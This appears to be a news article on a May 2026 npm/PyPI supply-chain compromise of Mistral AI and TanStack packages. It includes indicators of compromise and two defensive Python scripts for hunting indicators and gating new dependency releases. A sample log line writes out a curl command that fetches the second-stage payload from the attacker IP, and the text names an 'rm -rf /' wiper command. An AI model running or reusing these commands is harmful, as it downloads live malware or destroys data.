Mini Shai-Hulud Supply-Chain Attack Hits Mistral AI, TanStack Packages

The Mini Shai-Hulud supply-chain campaign compromised Mistral AI and TanStack packages on npm and PyPI, stealing GitHub tokens and cloud credentials from developer machines.

A malicious software supply-chain campaign tracked as Mini Shai-Hulud compromised official Mistral AI SDK packages and several widely used TanStack JavaScript libraries, security researchers disclosed in mid-May 2026. The infected packages silently exfiltrated GitHub personal access tokens, npm publishing credentials, cloud API keys, and CI/CD secrets from developer workstations and build runners, while a destructive secondary payload capable of wiping Linux hosts lay dormant under specific geographic conditions.

Microsoft Threat Intelligence and the security firm Aikido independently confirmed overlapping compromises spanning both the npm and PyPI registries. The affected packages collectively register tens of millions of downloads per week, placing thousands of downstream projects, enterprise CI pipelines, and production deployments within the blast radius of a single poisoned import.

Why It Matters

Modern software development runs on shared dependencies. The npm registry hosts over two million packages; the Python Package Index contains more than 400,000 projects. A single compromised package can fan out into thousands of downstream applications before detection, which is why supply-chain attacks have become one of the most leveraged threat vectors in the industry. According to Sonatype’s 2025 State of the Software Supply Chain report, malicious package uploads grew roughly 200% year over year, underscoring how dependency trust is now a primary attack surface.

Past incidents reinforce the stakes. The SolarWinds supply-chain compromise demonstrated how a single hijacked build pipeline can ripple through government agencies and Fortune 500 networks. The event-stream npm incident, the 3CX desktop-app attack, and the narrowly averted XZ Utils backdoor all reinforced the same lesson: when attackers seize a trusted upstream dependency, they inherit the trust of every downstream consumer. The Mini Shai-Hulud campaign sharpens that threat by targeting AI development tooling, cloud SDKs, and frontend frameworks simultaneously, ecosystems that ship code directly into production through automated publishing.

What’s New / How It Works

Aikido first raised the alarm after detecting that several TanStack packages had been republished with malicious code across two attack waves beginning around 19:20 UTC on May 11, 2026. The compromised packages included @tanstack/react-router, @tanstack/history, and @tanstack/router-core, core routing libraries used in thousands of React applications. Within hours, Aikido confirmed that three Mistral AI npm SDK packages, @mistralai/mistralai, @mistralai/mistralai-azure, and @mistralai/mistralai-gcp, had been infected as part of the same ongoing campaign.

On the Python side, Microsoft Threat Intelligence disclosed that version 2.4.6 of the mistralai package on PyPI had been trojanized. Attackers injected malicious code directly into mistralai/client/__init__.py, a file that executes automatically whenever the package is imported. On Linux systems, that code used curl to silently retrieve a second-stage payload from a remote command-and-control server at IP address 83.142.209.194, saving it to /tmp/transformers.pyz. The filename was selected deliberately to resemble Hugging Face’s widely used Transformers machine-learning framework, allowing the malware to blend into AI development environments without raising suspicion.

Once dropped, the payload ran as a detached background process independent of the original Python session. Its primary function was credential harvesting: it swept the host for GitHub personal access tokens, npm publishing tokens, cloud provider API keys, SSH credentials, and CI/CD secrets. Microsoft analysts also identified country-aware logic that caused the malware to exit without executing on systems configured with Russian-language locales, a trait frequently observed in financially motivated cybercrime operations, though not definitive for attribution. More concerning, the payload contained a destructive branch capable of executing rm -rf / under certain geographic conditions, a command that irreversibly wipes the host filesystem. The malware suppressed visible errors throughout, making detection during normal development workflows unlikely.

The Numbers

  • 3 TanStack packages compromised: @tanstack/react-router, @tanstack/history, and @tanstack/router-core, collectively downloaded tens of millions of times per week.
  • 3 Mistral npm SDKs infected: @mistralai/mistralai, @mistralai/mistralai-azure, and @mistralai/mistralai-gcp.
  • 1 PyPI package trojanized: mistralai version 2.4.6, with injected code that executed automatically on import.
  • 1 staging IP address: 83.142.209.194, used to fetch the /tmp/transformers.pyz second-stage payload.
  • Credential targets: GitHub personal access tokens, npm publishing tokens, cloud API keys, SSH keys, and CI/CD secrets.
  • Geographic evasion: Malware exits without executing on Russian-language system locales.
  • Destructive capacity: Conditional rm -rf / branch can irreversibly wipe Linux hosts.
  • ~200% year-over-year growth in malicious open-source package uploads, per Sonatype’s 2025 State of the Software Supply Chain report.

“Microsoft is investigating mistralai PyPI package v2.4.6 compromise. Attackers injected code in mistralai/client/__init__.py that executes on import, downloads hxxps://83[.]142[.]209[.]194/transformers.pyz to /tmp/transformers.pyz, and launches a second-stage payload on Linux.”

Microsoft Threat Intelligence, X post, May 12, 2026

A single infected package can cascade through thousands of projects, turning open-source trust into a weapon for credential theft and system destruction.

What Comes Next

Microsoft and Aikido both confirm the investigation remains active, and additional compromised packages are likely to surface as maintainers audit their publishing infrastructure and rotate exposed credentials. Microsoft has urged organizations to isolate any affected Linux hosts immediately, block outbound connections to 83.142.209.194, and hunt for indicators of compromise including /tmp/transformers.pyz, pgmonitor.py, and pgsql-monitor.service. Aikido separately advised developers to pin affected packages to safe versions and revoke any tokens that touched a machine where the malicious versions were installed.

Beyond this specific incident, expect follow-on disclosures from the PyPI and npm security teams as maintainers regain control of compromised accounts. Both registries have been expanding mandatory two-factor authentication and trusted-publishing requirements for high-impact packages, and a campaign of this scale will likely accelerate those policy shifts. The broader security community is also revisiting package signing, provenance verification, and automated anomaly detection in registry upload pipelines as structural defenses against the next wave.

What This Means for You

If your team builds or deploys software that depends on open-source AI libraries or frontend frameworks, this attack is a direct wake-up call. The compromised packages are official, well-known SDKs, not obscure transitive dependencies, which means standard allowlisting and reputation-based trust models would not have caught them. Your lockfiles, CI logs, and secret stores all need immediate attention.

Start with these concrete steps: review your project manifests and lockfiles for the exact compromised versions; run npm audit or pip-audit across your dependency trees; rotate every secret that may have been accessible from affected environments, prioritizing GitHub tokens, npm publishing tokens, and cloud provider keys; and inspect build logs for unexpected outbound connections to the staging IP. Longer term, adopt least-privilege scoping for CI tokens, pin dependency versions with integrity hashes, enable two-factor authentication on all package-manager accounts, and move cloud secrets out of developer laptops into a managed vault.
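The manifest, lockfile and build-log checks from the steps above (the same ones the FAQ answer to “How can I check if I was affected?” describes), as an added example that is not Microsoft’s or Aikido’s tooling. It uses only the indicators the article names; the requirements file, package-lock.json and log lines it runs over are constructed samples, and because the article gives no bad npm version numbers, any pinned version of the watch-listed packages is reported for manual comparison against the vendor advisory.

```python
"""Hunt for the Mini Shai-Hulud indicators named in the article. Added example, not
Microsoft's or Aikido's tooling; the sample inputs at the bottom are constructed."""
import json
import re

STAGING_IP = "83.142.209.194"
HOST_ARTIFACTS = ("/tmp/transformers.pyz", "pgmonitor.py", "pgsql-monitor.service")
TROJANIZED_PYPI = {"mistralai": {"2.4.6"}}  # the one exact bad release the article names
# The article gives no bad npm version numbers, so every pinned version of these
# packages is reported for manual comparison against the vendor advisory.
WATCHLIST_NPM = {"@tanstack/react-router", "@tanstack/history", "@tanstack/router-core",
                 "@mistralai/mistralai", "@mistralai/mistralai-azure", "@mistralai/mistralai-gcp"}

def check_requirements(text: str) -> list[str]:
    """Flag 'name==version' pins in a requirements file that match a trojanized release."""
    hits = []
    for line in text.splitlines():
        m = re.match(r"\s*([A-Za-z0-9_.-]+)\s*==\s*([0-9][\w.]*)", line)
        if m and m.group(2) in TROJANIZED_PYPI.get(m.group(1).lower(), set()):
            hits.append(f"pypi {m.group(1)}=={m.group(2)}: trojanized release")
    return hits

def check_package_lock(lock_json: str) -> list[str]:
    """List watch-listed packages present in a package-lock.json v2/v3 'packages' map."""
    hits = []
    for path, meta in json.loads(lock_json).get("packages", {}).items():
        name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
        if name in WATCHLIST_NPM:
            hits.append(f"npm {name}@{meta.get('version')}: verify against advisory")
    return hits

def check_log_lines(lines) -> list[str]:
    """Keep build-log lines that mention the staging IP or one of the dropped artifacts."""
    return [ln for ln in lines if STAGING_IP in ln or any(a in ln for a in HOST_ARTIFACTS)]

# Constructed sample inputs (not real project files or CI logs).
SAMPLE_REQUIREMENTS = "requests==2.32.3\nmistralai==2.4.6\nnumpy==2.2.0\n"
SAMPLE_LOCK = json.dumps({"packages": {
    "": {"name": "demo-app", "version": "1.0.0"},
    "node_modules/react": {"version": "19.0.0"},
    "node_modules/@tanstack/react-router": {"version": "0.0.0-constructed"},
}})
SAMPLE_LOG = [
    "npm http fetch GET 200 https://registry.npmjs.org/react",
    "curl -s https://83.142.209.194/transformers.pyz -o /tmp/transformers.pyz",
    "Build finished in 42s",
]
```

Point the three functions at your real requirements files, package-lock.json files and CI log exports; a hit from check_requirements or check_log_lines is a confirmed indicator, while a hit from check_package_lock only says the package is present and its version still has to be compared with the published bad versions.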

The speed at which AI developer tooling is advancing makes secure dependency management a governance requirement, not a nice-to-have. As AI-powered coding agents and automated git forges accelerate the pace of commits, they also multiply the number of systems and credentials a single infected package can reach. At the same time, the concentration of value in developer platforms, highlighted by deals like the SpaceX acquisition of Cursor for $60 billion, makes the toolchain itself a top-tier target. Every organization writing software today needs to treat its dependency tree as production infrastructure, because attackers already do.

The Bigger Picture

The Mini Shai-Hulud campaign is less about any single compromised package and more about an attacker economy that has internalized the economics of trust. Maintainers, AI SDKs, and frontend frameworks all sit upstream of millions of installs, making them the highest-leverage targets on the internet. Defenders need to assume that any popular package can be hijacked tomorrow and design their pipelines so that a stolen token, a tampered tarball, or a hostile import cannot escalate into a root-level incident. Treat your supply chain like production code, because to your adversaries, it already is.

Frequently Asked Questions

What is the Mini Shai-Hulud supply-chain attack?
Mini Shai-Hulud is the name researchers at Aikido and Microsoft Threat Intelligence are using for an ongoing software supply-chain campaign discovered in May 2026. The attackers compromised official npm packages in the TanStack and Mistral AI ecosystems, plus the mistralai package on PyPI. The infected packages silently download a second-stage payload that steals GitHub tokens, cloud API keys, and CI/CD secrets from developer machines and build runners. The malware also contains a destructive branch capable of wiping Linux hosts with an rm -rf / command under certain geographic conditions. The campaign name references the malware’s ability to burrow through trusted dependency chains.
Which Mistral AI packages were compromised?
On npm, Aikido identified malicious versions of @mistralai/mistralai, @mistralai/mistralai-azure, and @mistralai/mistralai-gcp. On PyPI, Microsoft confirmed that the mistralai package version 2.4.6 had been trojanized, with injected code hidden inside mistralai/client/__init__.py that executed automatically whenever the package was imported on Linux systems. The code downloaded a second-stage payload disguised as transformers.pyz, a filename chosen to blend into machine-learning environments.
Which TanStack packages were affected?
Aikido reported that @tanstack/react-router, @tanstack/history, and @tanstack/router-core were republished with malicious code across two attack waves beginning around 19:20 UTC on May 11, 2026. These are core React routing libraries used in thousands of web applications, collectively downloaded tens of millions of times per week, which is what makes the compromise high-impact.
What credentials are at risk?
The second-stage malware is designed to harvest GitHub personal access tokens, npm publishing tokens, cloud provider API keys (AWS, GCP, and others), SSH credentials, and CI/CD secrets. Any developer workstation or CI runner that installed a compromised version and had these credentials accessible on the same machine should consider them compromised and rotate them immediately, even if no visible symptoms were observed.
How can I check if I was affected?
Review your project lockfiles and package manifests for the exact compromised versions: mistralai==2.4.6 on PyPI, and the listed npm package versions published during the attack window. On Linux build machines, check for the presence of /tmp/transformers.pyz, pgmonitor.py, or pgsql-monitor.service. Microsoft also recommends blocking outbound connections to IP address 83.142.209.194 and reviewing network logs for unexpected curl or download activity originating from development environments.
What should I do if I installed a compromised package?
Immediately rotate every credential that was accessible from the affected environment: GitHub tokens, npm publishing tokens, cloud API keys, SSH keys, and CI/CD variables. Isolate the host, remove the malicious package, and run a full security scan. If the host was a CI runner, regenerate all associated secrets and audit recent commits pushed from that runner for unauthorized changes. Then pin the affected packages to verified safe versions.
How can teams defend against supply-chain attacks like this?
Pin package versions with exact integrity hashes instead of floating version ranges. Enable two-factor authentication and trusted publishing on all package manager accounts. Scope CI tokens with least privilege and short expiration windows. Move secrets out of developer laptops and into a managed vault or secrets manager. Add automated CI checks that flag newly published dependencies with zero history or suspicious version bumps. Finally, treat every open-source import as a trust decision that should be reviewed, not automatically accepted.
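One way to implement the “flag newly published dependencies with zero history” check from the last answer, as an added example that is not part of the article or of any vendor’s tooling: the gate below reads the time map of a full npm registry packument (the JSON served at https://registry.npmjs.org/<name>) and blocks lockfile entries whose version is younger than a quarantine window or is the package’s only release. The packuments and lockfile are constructed, the 7-day window is an assumed policy value, and fetching the packument over the network is left to the caller.

```python
"""CI gate for the 'newly published dependencies with zero history' check the article
recommends. Added example (not Aikido's or Microsoft's tooling); the packuments and lockfile
below are constructed, and the 7-day quarantine window is an assumed policy value."""
from datetime import datetime, timedelta

QUARANTINE = timedelta(days=7)  # assumption: how long a fresh release must age before use

def parse_ts(ts: str) -> datetime:
    """Registry timestamps are ISO-8601 with a trailing Z."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))

def assess(name: str, version: str, packument: dict, now: datetime) -> list[str]:
    """Reasons to block name@version; an empty list means it passes the gate."""
    # The full packument's 'time' map holds one publish timestamp per version.
    history = {v: parse_ts(t) for v, t in packument.get("time", {}).items()
               if v not in ("created", "modified")}
    if version not in history:
        return [f"{name}@{version}: not in the registry's publish history"]
    reasons = []
    age = now - history[version]
    if age < QUARANTINE:
        reasons.append(f"{name}@{version}: published {age} ago, inside quarantine window")
    if len(history) == 1:
        reasons.append(f"{name}@{version}: first and only release of this package")
    return reasons

def gate_lockfile(lock: dict, packuments: dict, now: datetime) -> list[str]:
    """Run assess() over every package-lock.json v2/v3 entry that has a fetched packument."""
    reasons = []
    for path, meta in lock.get("packages", {}).items():
        name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
        if name in packuments:
            reasons += assess(name, meta["version"], packuments[name], now)
    return reasons

# Constructed packuments: an established package with a fresh release, and a brand-new one.
PACKUMENTS = {
    "@example/router": {"time": {
        "created": "2024-01-10T00:00:00.000Z", "modified": "2026-05-11T19:20:00.000Z",
        "1.0.0": "2024-01-10T00:00:00.000Z", "1.1.0": "2025-03-02T12:00:00.000Z",
        "1.1.1": "2026-05-11T19:20:00.000Z"}},
    "@example/newcomer": {"time": {
        "created": "2026-05-11T20:00:00.000Z", "modified": "2026-05-11T20:00:00.000Z",
        "0.0.1": "2026-05-11T20:00:00.000Z"}},
}
NOW = parse_ts("2026-05-12T09:00:00Z")
SAMPLE_LOCK = {"packages": {"node_modules/@example/router": {"version": "1.1.1"},
                            "node_modules/@example/newcomer": {"version": "0.0.1"}}}
```

In a pipeline, fail the build when gate_lockfile returns anything and require a reviewed allowlist entry to override, so a freshly republished version of an otherwise trusted package cannot reach a runner before it has aged and been looked at.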
